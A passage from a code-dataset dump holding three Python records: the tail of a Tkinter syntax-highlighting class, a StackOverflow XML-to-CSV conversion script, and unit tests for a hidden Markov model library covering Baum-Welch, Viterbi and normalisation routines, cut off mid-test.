regex, lista, linha, palavra, cor):\n\n        for valor in finditer(regex, lista[linha]):\n\n            inici_regex = valor.start()\n            final_regex = valor.end()\n\n            usado = cor + str(palavra) + str(regex) + str(inici_regex) + str(final_regex) + str(linha+1)\n\n            self.__historico_coloracao.append(usado)\n            Colorir.__realiza_coloracao(self, str(usado), str(linha + 1), inici_regex, final_regex, cor)\n\n            if usado not in self.__lista_todos_coloracao:\n                self.__lista_todos_coloracao.append(usado)\n\n    def __filtrar_palavras(palavra):\n        palavra_comando = palavra.replace('+', '\\\\+')\n        palavra_comando = palavra_comando.replace('/', '\\\\/')\n        palavra_comando = palavra_comando.replace('*', '\\\\*')\n        palavra_comando = palavra_comando.replace(' ', '[\\\\s{1,}|_]')\n        return palavra_comando\n\n    def __colorir_comandos(self, lista_linhas):\n\n        # Gets a copy of the code so the interpreter can analyze it faster\n        texto = \"\"\n        for linha in lista_linhas:\n            texto += linha\n        texto = texto.replace(' ', '')\n        texto = texto.lower()\n        texto = texto.replace('_', '')\n\n        for chave_comando, dicionario_comandos in self.dic_comandos.items():\n            cor = self.cor_do_comando[dicionario_comandos[\"cor\"]][\"foreground\"]\n\n            for comando in dicionario_comandos[\"comando\"]:\n\n                palavra_analise = comando[0].strip()\n\n                if palavra_analise == \"\":\n                    continue\n\n                # Checks whether the command is present in the code\n                comando_teste = palavra_analise.replace(' ', '')\n                if comando_teste not in texto:\n                    continue\n\n                palavra_comando = Colorir.__filtrar_palavras(palavra_analise)\n\n                regex = '(^|\\\\s){}(\\\\s|$)'.format(palavra_comando)\n\n                for linha in range(len(lista_linhas)):\n                    Colorir.__marcar_coloracao(self, regex, lista_linhas, linha, palavra_comando, cor)\n\n    def __colorir_especial(self, lista):\n\n        for linha in range(len(lista)):\n\n            regex_comentario = '(#|\\\\/\\\\/).*$'\n            regex_numerico = '(^|\\\\s|\\\\,)([0-9\\\\.]\\\\s*){1,}($|\\\\s|\\\\,)'\n            regex_string = \"\"\"\\\"[^\"]*\\\"\"\"\"\n            regex_chave = \"{|}\"\n            regex_cor = \"na\\\\s*cor\\\\s*\\\"(.*?)\\\"\"\n\n            cor_comentario = self.cor_do_comando[\"comentario\"][\"foreground\"]\n            cor_numerico = self.cor_do_comando[\"numerico\"][\"foreground\"]\n            cor_chave = self.cor_do_comando[\"logico\"][\"foreground\"]\n            cor_string = self.cor_do_comando[\"string\"][\"foreground\"]\n\n            cor_cor = search(regex_cor, str(lista[linha]))\n\n            
Colorir.__marcar_coloracao(self, regex_numerico, lista, linha, 'numerico', cor_numerico)\n Colorir.__marcar_coloracao(self, regex_chave, lista, linha, 'chave', cor_chave)\n Colorir.__marcar_coloracao(self, regex_string, lista, linha, '\"', cor_string)\n\n if \"#\" in lista[linha]:\n Colorir.__marcar_coloracao(self, regex_comentario, lista, linha, 'comentario', cor_comentario)\n\n if cor_cor is not None:\n cor_cor = str(cor_cor.group(1))\n Colorir.__marcar_coloracao(self, regex_cor, lista, linha, 'corcor', cor_cor)\n\n\n def coordena_coloracao(self, event, tx_editor_codigo):\n self.__tx_editor_codigo = tx_editor_codigo\n\n lista_linhas = self.__tx_editor_codigo.get(1.0, END).lower().split('\\n')\n\n self.__historico_coloracao = []\n\n Colorir.__colorir_comandos(self, lista_linhas)\n Colorir.__colorir_especial(self, lista_linhas)\n\n for palavra_nao_colorida in self.__lista_todos_coloracao:\n if palavra_nao_colorida not in self.__historico_coloracao:\n self.__tx_editor_codigo.tag_delete(palavra_nao_colorida)\n self.__lista_todos_coloracao.remove(palavra_nao_colorida)\n\n if self.master is not None:\n self.master.update()\n\n return 0\n","repo_name":"gabrielogregorio/safira","sub_path":"telas/Colorir.py","file_name":"Colorir.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"pt","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"23531314198","text":"#!/usr/bin/env python3\n\n\"\"\"\nso_xml2csv.py - Converts stackoverflow xml dump data to csv format\nAuthor: Jonas Gorauskas\nCreated: 2014-09-01 13:53:06\nModified: 2014-09-01 17:21:37\nDescription:\n\nThis script converts stackoverflow xml dump data to csv format for the purposes\nof easy insertion into a SQL database such as Postgreql.\n\nHistory:\n\n 2014-09-01 13:53:06 - JGG\n Initial commit\n\n 2014-09-01 17:11:48 - JGG\n Change xml parsing strategy:\n - use the c implementation of ElementTree\n - use a generator function\n\n 2014-09-01 17:21:05 - JGG\n Adding function to escape html into a safe string for DB\n\n\"\"\"\n\nimport xml.etree.cElementTree as etree\nimport argparse\nimport time\nimport html\n\n\nclass Timer:\n def __enter__(self):\n self.start = time.clock()\n return self\n\n def __exit__(self, *args):\n self.end = time.clock()\n self.interval = self.end - self.start\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-V', '--version',\n action='version',\n version='%(prog)s 0.1.0 - written by Jonas Gorauskas')\n parser.add_argument('-i', '--input', required=True, dest='input_file',\n help='The input file to be processed')\n parser.add_argument('-o', '--output', required=True, dest='output_file',\n help='The output file to save results to')\n parser.add_argument('-c', '--columns', required=True, dest='columns',\n help='A comma delimited string denoting column order')\n\n return parser.parse_args()\n\n\ndef get_data(fn, columns):\n cols = columns.split(',')\n res = ''\n\n for col in cols:\n res = res + col + ','\n\n res = res[:-1] + '\\n'\n yield res\n\n for evt, row in etree.iterparse(fn):\n res = ''\n if row.tag == 'row':\n for col in cols:\n if col in row.attrib:\n if row.attrib[col].isnumeric():\n res = res + row.attrib[col] + ','\n else:\n res = res + '\"' + escape_str(row.attrib[col]) + '\",'\n else:\n res = res + ','\n res = res[:-1] + '\\n'\n yield res\n row.clear()\n\n\ndef save_data(fn, data):\n with open(fn, 'w') as f:\n for row in data:\n f.write(row)\n\n\ndef escape_str(html_str):\n s = html.escape(html_str)\n return s.replace('\\n', 
' ')\n\n\ndef main():\n    args = parse_args()\n    with Timer() as t:\n        data = get_data(args.input_file, args.columns)\n        save_data(args.output_file, data)\n    print('Done! Work took %.03f secs...' % t.interval)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"lolsadeq/Hacks","sub_path":"python/so_xml2csv.py","file_name":"so_xml2csv.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74782005285","text":"import unittest\nimport os\nfrom numpy import array, allclose, zeros, take\nimport logilab.hmm.hmm as hmm\nimport logilab.hmm.hmmc as hmmc\nimport logilab.hmm.hmmf as hmmf\nimport logilab.hmm.hmmS as hmmS\n\nclass TestInitProba(unittest.TestCase):\n    \"\"\"Test random initialization functions.\"\"\"\n    hmmKlass = hmm.HMM\n\n    def setUp(self):\n        self.hmm = self.hmmKlass(['a', 'b'], ['1', '2'], None,\n                                None, None)\n    def test_random_1_1(self):\n        self.hmm.set_random_transition_proba()\n        self.hmm.checkHMM()\n\n    def test_random_1_2(self):\n        self.hmm.set_random_observation_proba()\n        self.hmm.checkHMM()\n\n    def test_random_1_3(self):\n        self.hmm.set_random_initial_proba()\n        self.hmm.checkHMM()\n\n\n    def test_random_1(self):\n        self.hmm.set_random_proba()\n        self.hmm.checkHMM()\n\n    def test_random_2(self):\n        self.hmm.reset_transition_proba()\n        self.failUnless(allclose(self.hmm.A, zeros((2, 2), float)))\n        self.hmm.set_transition_proba('a', 'b', 1 )\n        self.hmm.set_transition_proba('b', 'a', 1 )\n        self.hmm.checkHMM()\n\n    def test_random_3(self):\n        self.hmm.reset_observation_proba()\n        self.failUnless(allclose(self.hmm.B, zeros((2, 2), float)))\n        self.hmm.set_observation_proba('a', '1', 1)\n        self.hmm.set_observation_proba('b', '1', 1)\n        self.hmm.checkHMM()\n\n    def test_random_4(self):\n        self.hmm.reset_initial_proba()\n        self.failUnless(allclose(self.hmm.pi, zeros(2, float)))\n        self.hmm.set_initial_proba('a', 0.5)\n        self.hmm.set_initial_proba('b', 0.5)\n        self.hmm.checkHMM()\n\nclass TestInitProbaC(TestInitProba):\n    hmmKlass = hmmc.HMM_C\n\nclass TestInitProbaF(TestInitProba):\n    hmmKlass = hmmf.HMM_F\n\nclass TestFunctions(unittest.TestCase):\n    \n    hmmKlass = hmm.HMM\n\n    def setUp(self):\n        self.observations = ['1', '2', '3']\n        self.hmm1 = self.hmmKlass(['a', 'b'], ['1', '2'],\n                            array([[0.2, 0.8],\n                                [0.3, 0.7]]),\n                            array( [[1., 0.2],\n                                    [0., 0.8]] ),\n                            array([0.3, 0.7]))\n        self.hmm2 = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n                            array([[1.0, 0.0],\n                                [0.0, 1.0]]),\n                            array([[0.5, 0.0],\n                                [ .5, .5],\n                                [0.0, 0.5]]),\n                            array([0.5, 0.5]))\n        self.hmm3 = self.hmmKlass(['a', 'b'], ['1', '2'],\n                            array([[0., 1.],\n                                [0., 1.]]),\n                            array( [[1., 0.],\n                                    [0., 1.]] ),\n                            array([0.5, 0.5]))\n        self.hmm4 = self.hmmKlass(['a', 'b'], ['1', '2', '3'])\n    \n    def test_simulate(self):\n        chain = self.hmm1.simulate(3)\n        self.assertEquals(len(chain), 3)\n        ens = set(chain)\n        while ens != set():\n            elt = ens.pop()\n            self.failUnless( elt in self.hmm1.omega_O)\n\n    def test_get_observation_indices(self):\n        result = array([0, 1, 2], int)\n        obs_ind = self.hmm2. 
_get_observationIndices(self.observations)\n self.failUnless(allclose(obs_ind, result))\n \n def test_normalize_1(self):\n res_a = array([[0.7, 0.3], [0.8, 0.2]])\n res_b = array([[0.2, 1.], [0.8, 0.]])\n res_pi = array([0.7, 0.3])\n A, B = zeros( (self.hmm1.N, self.hmm1.N), float)\n PI = zeros( self.hmm1.N)\n A, B, PI = self.hmm1.normalize()\n self.failUnless(allclose(A, res_a))\n self.failUnless(allclose(B, res_b))\n self.failUnless(allclose(PI, res_pi))\n \n def test_normalize_2(self):\n res_a = array([[0.7, 0.3], [0.8, 0.2]])\n res_b = array([[0.2, 1.], [0.8, 0.]])\n res_pi = array([0.7, 0.3])\n A, B = zeros( (self.hmm1.N, self.hmm1.N), float)\n PI = zeros( self.hmm1.N)\n P = array([1, 0])\n A, B, PI = self.hmm1.normalize(P)\n self.failUnless(allclose(A, res_a))\n self.failUnless(allclose(B, res_b))\n self.failUnless(allclose(PI, res_pi))\n\n def test_correctm_1( self):\n M = array([[1., 0.], [0., 0.]])\n k = 1\n p = 0.5\n result = array([[1., 0.], [0.5, 0.5]])\n MM = self.hmm3.correct_M(M, k, p)\n self.failUnless( allclose(result, MM))\n\n def test_correctm_2( self):\n M = array([[0., 0.], [0., 0.]])\n k = 1\n p = 0.5\n result = array([[0.5, 0.5], [0.5, 0.5]])\n MM = self.hmm3.correct_M(M, k, p)\n self.failUnless( allclose(result, MM))\n\n def test_alpha_scaled_1(self):\n obs_indices = [0, 1]\n res_alpha = array([[1, 0], [0, 1]])\n res_fact = array([2., 1.])\n Bo = take(self.hmm3.B, obs_indices, 0)\n alpha, fact = self.hmm3.alpha_scaled(self.hmm3.A, Bo, self.hmm3.pi )\n self.failUnless( allclose(alpha, res_alpha))\n self.failUnless( allclose(fact, res_fact))\n\n def test_alpha_scaled_2(self):\n obs_indices = [0, 1, 2]\n res_alpha = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n res_fact = array([3., 3., 3.])\n Bo = take(self.hmm4.B, obs_indices, 0)\n alpha, fact = self.hmm4.alpha_scaled(self.hmm4.A, Bo, self.hmm4.pi )\n self.failUnless( allclose(alpha, res_alpha))\n self.failUnless( allclose(fact, res_fact))\n\n def test_beta_scaled_1(self):\n obs_indices = [0, 1, 1]\n fact = array([2., 1., 1.])\n res_beta = array([[2., 2.], [1., 1.], [1., 1.]])\n Bo = take(self.hmm3.B, obs_indices, 0)\n beta = self.hmm3.beta_scaled(self.hmm3.A, Bo, fact )\n self.failUnless( allclose(beta, res_beta))\n\n def test_beta_scaled_2(self):\n obs_indices = [0, 1, 2]\n fact = array([3., 3., 3.])\n res_beta = array([[3., 3.], [3., 3.], [3., 3.]])\n Bo = take(self.hmm4.B, obs_indices, 0)\n beta = self.hmm4.beta_scaled(self.hmm4.A, Bo, fact )\n self.failUnless( allclose(beta, res_beta))\n\n def test_gamma_1(self):\n res = array([[1, 0], [0, 1], [0, 1]], float)\n obs_indices = [0, 1, 1]\n A = self.hmm3.A\n B = self.hmm3.B\n PI = self.hmm3.pi\n Bo = take(B, obs_indices, 0)\n alpha, scale_factors = self.hmm3.alpha_scaled(A, Bo, PI )\n beta = self.hmm3.beta_scaled( A, Bo, scale_factors )\n gamma = self.hmm3._gamma(alpha, beta, scale_factors)\n self.failUnless(allclose(gamma, res))\n\n def test_gamma_2(self):\n res = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n obs_indices = [0, 1, 2]\n A = self.hmm4.A\n B = self.hmm4.B\n PI = self.hmm4.pi\n Bo = take(B, obs_indices, 0)\n alpha, scale_factors = self.hmm4.alpha_scaled(A, Bo, PI )\n beta = self.hmm4.beta_scaled( A, Bo, scale_factors )\n gamma = self.hmm4._gamma(alpha, beta, scale_factors)\n self.failUnless(allclose(gamma, res))\n\n def test_ksi_1(self):\n obs_indices = [0, 1, 1]\n Bo = take(self.hmm3.B, obs_indices, 0)\n alpha, scale_factors = self.hmm3.alpha_scaled(self.hmm3.A, \n Bo, self.hmm3.pi)\n beta = self.hmm3.beta_scaled( self.hmm3.A, Bo, scale_factors )\n ksy 
= self.hmm3.ksi( self.hmm3.A, Bo, alpha, beta )\n res_ksi = array([ [[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]]])\n self.failUnless( allclose(ksy, res_ksi))\n\n def test_ksi_2(self):\n obs_indices = [0, 1, 2]\n Bo = take(self.hmm4.B, obs_indices, 0)\n alpha, scale_factors = self.hmm4.alpha_scaled(self.hmm4.A, \n Bo, self.hmm4.pi)\n beta = self.hmm4.beta_scaled( self.hmm4.A, Bo, scale_factors )\n ksy = self.hmm4.ksi( self.hmm4.A, Bo, alpha, beta )\n res_ksi = array([ [[0.25, 0.25], [0.25, 0.25]], \n [[0.25, 0.25], [0.25, 0.25]]])\n self.failUnless( allclose(ksy, res_ksi))\n\n def test_update_iter_gamma_1(self):\n gamma = array([[1., 0.], [0., 1.], [0., 1.]])\n sigma_gamma_A = zeros(2)\n sigma_gamma_B = zeros(2)\n sga = array([1., 1.])\n sgb = array([1., 2.]) \n self.hmm3._update_iter_gamma( gamma, sigma_gamma_A, sigma_gamma_B )\n self.failUnless( allclose(sga, sigma_gamma_A))\n self.failUnless( allclose(sgb, sigma_gamma_B))\n\n def test_update_iter_gamma_2(self):\n gamma = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n sigma_gamma_A = zeros(2)\n sigma_gamma_B = zeros(2)\n sga = array([1., 1.])\n sgb = array([1.5, 1.5]) \n self.hmm4._update_iter_gamma( gamma, sigma_gamma_A, sigma_gamma_B )\n self.failUnless( allclose(sga, sigma_gamma_A))\n self.failUnless( allclose(sgb, sigma_gamma_B))\n\n def test_update_iterb_1(self):\n B = self.hmm3.B\n B_bar = B\n gamma = array([[1., 0.], [0., 1.], [0., 1.]])\n obs_indices = [0, 1, 1]\n self.hmm3.update_iter_B( gamma, obs_indices, B_bar )\n self.failUnless( allclose(B, B_bar))\n\n def test_update_iterb_2(self):\n B_bar = self.hmm4.B\n gamma = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n obs_indices = [0, 1, 2]\n result = array([[5./6, 5./6], [5./6, 5./6], [5./6, 5./6]]) \n self.hmm4.update_iter_B( gamma, obs_indices, B_bar )\n self.failUnless( allclose(result, B_bar))\n\n def test_update_itera_1(self):\n ksi = array([ [[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]] ])\n A_bar = zeros((2, 2))\n resA = array([[0., 1.], [0., 1.]])\n self.hmm3._update_iter_A( ksi, A_bar )\n self.failUnless( allclose(resA, A_bar))\n\n def test_update_itera_2(self):\n ksi = array([ [[0.25, 0.25], [0.25, 0.25]], [[0.25, 0.25], [0.25, 0.25]]])\n A_bar = zeros((2, 2))\n resA = array([[0.5, 0.5], [0.5, 0.5]])\n self.hmm4._update_iter_A( ksi, A_bar )\n self.failUnless( allclose(resA, A_bar))\n\n def test_normalize_itera_1(self):\n A_bar = array([[0., 1.], [0., 1.]])\n sga = array([1., 1.])\n result = A_bar\n self.hmm3._normalize_iter_A(A_bar, sga )\n self.failUnless( allclose(A_bar, result))\n \n def test_normalize_itera_2(self):\n A_bar = array([[0.5, 0.5], [0.5, 0.5]])\n sga = array([1., 1.])\n result = A_bar\n self.hmm4._normalize_iter_A(A_bar, sga )\n self.failUnless( allclose(A_bar, result))\n\n def test_normalizeb_1( self):\n B_bar = array([[1., 0.], [0., 2.]])\n sgb = array([1., 2.])\n result = array([[1., 0.], [0., 1.]])\n self.hmm4.normalize_B(B_bar, sgb)\n self.failUnless(allclose(B_bar, result))\n\n def test_normalizeb_2( self):\n B_bar = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n sgb = array([1.5, 1.5])\n result = array([[1./3, 1./3], [1./3, 1./3], [1./3, 1./3]])\n self.hmm4.normalize_B(B_bar, sgb)\n self.failUnless(allclose(B_bar, result))\n\n def test_stop(self):\n self.hmm3._stop_condition(self.hmm3.A, self.hmm3.pi, self.hmm3.B)\n \n def test_final_step(self):\n obs_indices = [0, 1, 1]\n gamma = array([[1., 0.], [0., 1.], [0., 1]])\n ksi = array([[[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]] ])\n Abar = array([[0., 1.], [0., 1.]])\n Bbar = array([[1., 0.], [0., 1.]])\n 
pibar = array([1., 0.])\n A , B, PI = self.hmm3._final_step( gamma, ksi, obs_indices )\n self.failUnless( allclose(Abar, A))\n self.failUnless( allclose(Bbar, B))\n self.failUnless( allclose(pibar, PI))\n\nclass TestFunctionsC (TestFunctions):\n hmmKlass = hmmc.HMM_C\n\nclass TestFunctionsF(TestFunctions):\n hmmKlass = hmmf.HMM_F\n\nclass TestWeightingFactor(unittest.TestCase):\n\n hmmKlass = hmm.HMM\n def setUp(self):\n self.hmm1 = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n array([[0., 1.],\n [1., 0.]]),\n array([[0.5, 0.0],\n [ .5, .5],\n [0.0, 0.5]]),\n array([0.5, 0.5]))\n self.hmm2 = self.hmmKlass(['a', 'b'], ['1', '2'],\n array([[0., 1.],\n [0., 1.]]),\n array( [[1., 0.],\n [0., 1.]] ),\n array([0.5, 0.5]))\n\n def test_Weighting_factor_Pall_1(self):\n set_obs = [['1', '2'], ['2', '2']]\n resP = 1./4\n P = self.hmm2._weighting_factor_Pall(set_obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pall_2(self):\n set_obs = [['1', '3'], ['1', '2'], ['2', '2']]\n resP = 1./256\n P = self.hmm1._weighting_factor_Pall(set_obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pk_1(self):\n obs = ['1', '2']\n resP = 1./2\n P = self.hmm2._weighting_factor_Pk(obs)\n self.failUnless(P == resP)\n\n def test_Weighting_factor_Pk_2(self):\n obs = ['1', '3']\n resP = 1./8\n P = self.hmm1._weighting_factor_Pk(obs)\n self.failUnless(P == resP)\n\nclass TestWeightingFactorC(TestWeightingFactor):\n hmmKlass = hmmc.HMM_C\n\nclass TestWeightingFactorF(TestWeightingFactor):\n hmmKlass = hmmf.HMM_F\n\nclass TestStates(unittest.TestCase):\n hmmKlass = hmmS.HMMS\n\n def setUp(self):\n self.hmm1 = hmmS.HMMS(['a', 'b', 'c'], ['1', '2', '3'])\n self.hmm2 = hmmS.HMMS(['a', 'b'], ['1', '2'])\n self.aHMM_1 = hmmS.HMMS( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3],[0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n\n def test_learn_A_1(self):\n states = ['a','a','b','a','c','b','c','a','b','a','c','b','a']\n result = array([[0.2, 0.4, 0.4], [0.75, 0, 0.25], [1./3, 2./3, 0]])\n self.hmm1._learn_A(states)\n self.failUnless( allclose(result, self.hmm1.A))\n\n def test_learnA_2(self):\n states = ['a', 'b', 'a', 'a', 'a', 'b', 'a']\n result = array([[0.5, 0.5, 0.], [1., 0., 0.], [0., 0., 1.]])\n self.hmm1._learn_A(states)\n self.failUnless( allclose(result, self.hmm1.A))\n \n def test_multiple_learnA(self):\n states = [['a', 'b'] * 3, ['b', 'a'] * 2]\n result = array([[0., 1.], [1., 0.]])\n self.hmm2._multiple_learn_A(states)\n self.failUnless( allclose(result, self.hmm2.A))\n\n def test_baumwelch(self):\n chain = ['1', '1'] * 4\n states = ['b', 'a'] + ['a', 'a'] * 3\n resA = array([[1., 0.], [1., 0.]])\n resB = array([[1., 1.], [0., 0.]])\n resPI = array([0.5, 0.5])\n self.hmm2.learn(chain, states)\n self.hmm2.checkHMM()\n self.failUnless( allclose(resA, self.hmm2.A))\n self.failUnless( allclose(resB, self.hmm2.B))\n self.failUnless( allclose(resPI, self.hmm2.pi))\n\n def test_multiple_learn_1(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n states = [['a'] + ['b'] * 4, ['a'] + ['b'] * 4, ['b'] * 5]\n self.hmm2.multiple_learn(chains, states)\n self.hmm2.checkHMM()\n\n def test_ens_average_1(self):\n chains = [ ['1'] + ['2'] * 4, ['1'] + ['2'] * 4, ['2'] * 5]\n states = [ ['a'] + ['b'] * 4, ['a'] + ['b'] * 4, ['b'] * 5 ]\n self.hmm2.ensemble_averaging(chains, states, \"unit\", 1000, 0)\n self.hmm2.checkHMM()\n\n def test_ens_average_2(self):\n chains = [['1', '1'] * 4] * 5\n states = [['b', 'a'] + ['a', 
'a'] * 3] * 5\n resA = array([[1., 0.], [1., 0.]])\n resB = array([[1., 1.], [0., 0.]])\n resPI = array([0.5, 0.5])\n self.hmm2.ensemble_averaging(chains, states, \"unit\" , 1000, 0)\n self.hmm2.checkHMM()\n self.failUnless( allclose(resA, self.hmm2.A))\n self.failUnless( allclose(resB, self.hmm2.B))\n self.failUnless( allclose(resPI, self.hmm2.pi))\n\nclass TestStatesC(TestStates):\n hmmKlass = hmmS.HMMS_C\n\nclass TestStatesF(TestStates):\n hmmKlass = hmmS.HMMS_F\n\nclass TestDeterministic(unittest.TestCase):\n \"\"\"Test the viterbi algorithm on a deterministic chain\"\"\"\n\n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.hmm = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n array([[1.0, 0.0],\n [0.0, 1.0]]),\n array([[0.5, 0.0],\n [ .5, .5],\n [0.0, 0.5]]),\n array([0.5, 0.5]))\n\n def _analyze_chain(self, mc, chain, result=None):\n an1 = mc.analyze(chain)\n an2 = mc.analyze_log(chain)\n self.assertEqual(an1, an2)\n if result:\n self.assertEqual(an1, result)\n\n def test_viterbi_1(self):\n \"\"\"Test the chain (1,1,1) [determ]\"\"\"\n chain = ['1'] * 3\n result = ['a', 'a', 'a']\n self._analyze_chain(self.hmm, chain, result)\n\t\t\n def test_viterbi_2(self):\n \"\"\"test the chain (2,1,1,1,1,1) [determ]\"\"\"\n result = ['a', 'a', 'a', 'a', 'a', 'a']\n chain = ['2'] + ['1'] * 5\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_3(self):\n \"\"\"test the chain (3,2,2,2,2,2) [determ]\"\"\"\n chain = ['3'] + ['2'] * 5\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_4(self):\n \"\"\"test the chain (2,2,3,3,3,2) [determ]\"\"\"\n chain = ['2', '2', '3', '3', '3', '2']\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n def test_viterbi_5(self):\n \"\"\"test the chain (2,2,2,2,2,3) [determ]\"\"\"\n chain = ['2', '2', '2', '2', '2', '3']\n result = ['b', 'b', 'b', 'b', 'b', 'b']\n self._analyze_chain( self.hmm, chain, result)\n\n\nclass TestDeterministicHmmC(TestDeterministic):\n hmmKlass = hmmc.HMM_C\n\nclass TestDeterministicHmmF(TestDeterministic):\n hmmKlass = hmmf.HMM_F\n\nclass test_baumwelch(unittest.TestCase):\n \"\"\"Test the Baumwelch algorithm\"\"\"\n\n def setUp(self):\n self.aHMM = hmm.HMM( ['a', 'b'], ['1', '2', '3'])\n self.aHMMC = hmmc.HMM_C( ['a', 'b'], ['1', '2', '3'])\n self.aHMMF = hmmf.HMM_F( ['a', 'b'], ['1', '2', '3'])\n \n self.aHMM_1 = hmm.HMM( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.aHMM_C = hmmc.HMM_C( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.aHMM_F = hmmf.HMM_F( ['a', 'b'], ['1', '2', '3'], \n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.4], [0.6, 0.2], [0.2, 0.4]]),\n array([0.2, 0.8]))\n self.det = hmm.HMM(['a'], ['1', '2'])\n self.test = hmm.HMM( range(5), range(5) )\n self.det2 = hmm.HMM(['a', 'b'], ['1', '2'] )\n\n def _learn_compare(self, chain): \n self.aHMM.learn(chain)\n self.aHMMC.learn(chain)\n self.aHMMF.learn(chain)\n \n self.failUnless(allclose(self.aHMMC.A, self.aHMM.A))\n self.failUnless(allclose(self.aHMMF.A, self.aHMM.A))\n self.failUnless(allclose(self.aHMMC.B, self.aHMM.B))\n self.failUnless(allclose(self.aHMMF.B, self.aHMM.B))\n self.failUnless(allclose(self.aHMMC.pi, self.aHMM.pi))\n self.failUnless(allclose(self.aHMMF.pi, self.aHMM.pi))\n\n def test_update_iterb(self):\n B_bar = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n 
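# --- Illustrative aside (not part of the test file) ---
# What an update_iter_B-style accumulation does, in plain NumPy terms: for
# each time step t whose observed symbol has index o_t, the state
# posteriors gamma[t] are added into row o_t of the (M x N) emission
# accumulator. The helper name and the in-place convention are
# illustrative assumptions, not the library's code.
def update_iter_B_sketch(gamma, obs_indices, B_bar):
    for t, o in enumerate(obs_indices):
        B_bar[o] += gamma[t]            # accumulate per observed symbol
    return B_bar
# A later pass divides each state's column by its summed gamma (compare
# the normalize_B tests above) so the columns become probabilities again.
# --- end aside ---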
B_barF = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n B_barC = array([[ 0., 0.], [ 0., 0.], [ 0., 0.]])\n gamma = array([[0.17584567, 0.82415433], [0.43775031, 0.56224969],\n [0.43195352, 0.56804648], [0.44859571, 0.55140429],\n [0.43240921, 0.56759079], [0.44861501, 0.55138499],\n [0.43241002, 0.56758998], [0.448615, 0.551385 ],\n [0.43240908, 0.56759092], [0.44859262, 0.55140738],\n [0.43188047, 0.56811953], [0.43601172, 0.56398828],\n [0.13479001, 0.86520999], [0.13445915, 0.86554085],\n [0.41918731, 0.58081269], [0.44750776, 0.55249224],\n [0.41943579, 0.58056421], [0.14038371, 0.85961629],\n [0.41931846, 0.58068154], [0.44469141, 0.55530859]])\n\n obs_indices = [0,1,0,1,0,1,2,1,2,1,0,1,0,1,0,1,2,1,0,2] \n self.aHMM.update_iter_B( gamma, obs_indices, B_bar )\n self.aHMMC.update_iter_B( gamma, obs_indices, B_barC )\n self.aHMMF.update_iter_B( gamma, obs_indices, B_barF )\n self.failUnless( allclose(B_bar, B_barC))\n self.failUnless( allclose(B_bar, B_barF))\n \n def test_baumwelch_1(self):\n \"\"\"test the observations (1,2,1,2,1,2,1,2,1,2) \"\"\"\n chain = ['1', '2'] * 5 \n self._learn_compare(chain)\n\n def test_baumwelch_2(self):\n \"\"\"test the observations (1,1,1,1,1,2,2,2,2,2) \"\"\"\n chain = ['1'] * 5 + ['2'] * 5\n self._learn_compare(chain)\n\n def test_baumwelch_3(self):\n \"\"\"test the observations (3,3,3,3,3,3,3,3,3,1) \"\"\"\n chain = ['3'] * 9 + ['1']\n self._learn_compare(chain)\n\n def test_baumwelch_4(self):\n \"\"\"test the observations (1,2,1,2,1,2,1,2,1,2) \"\"\"\n chain = ['1', '2'] * 5 \n self._learn_compare(chain)\n\n def test_baumwelch_6(self):\n chain = ['2'] * 2\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.learn(chain)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_baumwelch_7(self):\n observation = self.test.simulate(10)\n self.test.set_random_proba()\n self.test.learn(observation)\n self.test.checkHMM()\n\n def test_multiple_learn_1(self):\n chains = []\n for i in xrange(10):\n chains.append(self.aHMM.simulate(10))\n A = self.aHMM.A\n B = self.aHMM.B\n PI = self.aHMM.pi\n self.aHMM.multiple_learn(chains)\n self.aHMM.checkHMM()\n self.failUnless( allclose(self.aHMM.A, A))\n self.failUnless( allclose(self.aHMM.B, B))\n self.failUnless( allclose(self.aHMM.pi, PI))\n\n def test_multiple_learn_2(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM_1.multiple_learn(chains)\n self.aHMM_1.checkHMM()\n self.aHMM_C.multiple_learn(chains)\n self.aHMM_C.checkHMM()\n self.aHMM_F.multiple_learn(chains)\n 